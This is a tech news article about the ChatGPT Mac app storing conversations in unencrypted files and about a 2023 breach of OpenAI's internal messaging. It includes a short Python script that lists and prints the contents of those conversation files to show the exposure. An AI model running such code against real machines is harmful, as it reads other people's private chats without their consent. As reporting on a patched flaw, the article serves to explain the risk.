This week, OpenAI faced two major security issues that have raised serious concerns about how the company handles cybersecurity:
First issue: ChatGPT Mac app security flaw
Developer Pedro José Pereira Vieito found a serious flaw in the ChatGPT Mac app: it stored user conversations on disk in plain text, with no encryption. This is a significant problem because the app is distributed only through OpenAI’s website rather than the Mac App Store, so it is not bound by Apple’s sandboxing requirement, a security mechanism that restricts what each app can access and keeps it from interfering with the rest of the system.
The OpenAI ChatGPT app on macOS is not sandboxed and stores all the conversations in **plain-text** in a non-protected location:
~/Library/Application Support/com.openai.chat/conversations-{uuid}/
So basically any other app / malware can read all your ChatGPT conversations.
— Pedro José Pereira Vieito (@pvieito) July 2, 2024
Storing the files in plain text meant that any other application or piece of malware running on the machine could read the conversations outright. After Vieito’s findings were reported by The Verge, OpenAI quickly released an update that encrypts the stored chats.
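To illustrate the exposure, here is a minimal sketch of how any unsandboxed process running under the same user account could have enumerated and read those files before the fix. The directory pattern comes from Vieito’s report; treating the conversation files as ordinary readable text is an assumption made purely for illustration.

```python
# Minimal sketch: before OpenAI's update, any process running as the
# logged-in user could read ChatGPT's unencrypted conversation files.
# The directory pattern follows Vieito's report; the assumption that the
# files are plain readable text is made for illustration only.
import glob
import os

base = os.path.expanduser("~/Library/Application Support/com.openai.chat")

# Enumerate every per-conversation folder and dump whatever it contains.
for path in glob.glob(os.path.join(base, "conversations-*", "*")):
    if not os.path.isfile(path):
        continue
    try:
        with open(path, "r", errors="replace") as f:
            print(f"--- {path} ---")
            print(f.read()[:500])  # a short excerpt is enough to show access
    except OSError as err:
        print(f"could not read {path}: {err}")
```

The point of the sketch is simply that no privilege escalation is needed: because the data sat unencrypted in a user-readable location, ordinary file reads were sufficient.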
Second issue: Broader cybersecurity concerns
The second issue dates back to 2023 but returned to the spotlight this week. In the spring of 2023, a hacker gained access to OpenAI’s internal messaging systems and stole sensitive company information. Leopold Aschenbrenner, a technical program manager at OpenAI, raised alarms about the breach, warning that it revealed security weaknesses that foreign adversaries could exploit.
Aschenbrenner reported his concerns to OpenAI’s board of directors and later claimed he was fired for raising them. OpenAI denied this, stating that his dismissal was unrelated to his whistleblowing, while acknowledging his commitment to AI safety.
Implications for OpenAI
Security problems happen to many tech companies, but these incidents are particularly concerning for OpenAI because of how widely ChatGPT is used. These issues raise questions about whether OpenAI can keep its data secure, especially as ChatGPT becomes more integrated into major services.
OpenAI’s response to these problems is crucial for maintaining public trust. The company’s security practices and transparency are now under scrutiny, and how it handles these concerns will shape its reputation going forward.
OpenAI is facing significant security challenges. The recent issues with the ChatGPT Mac app and broader cybersecurity vulnerabilities highlight the need for better security measures and clear communication. As OpenAI continues to innovate, addressing these security concerns will be essential for maintaining trust and ensuring safe AI development.
Featured image credit: Eray Eliaçık/Bing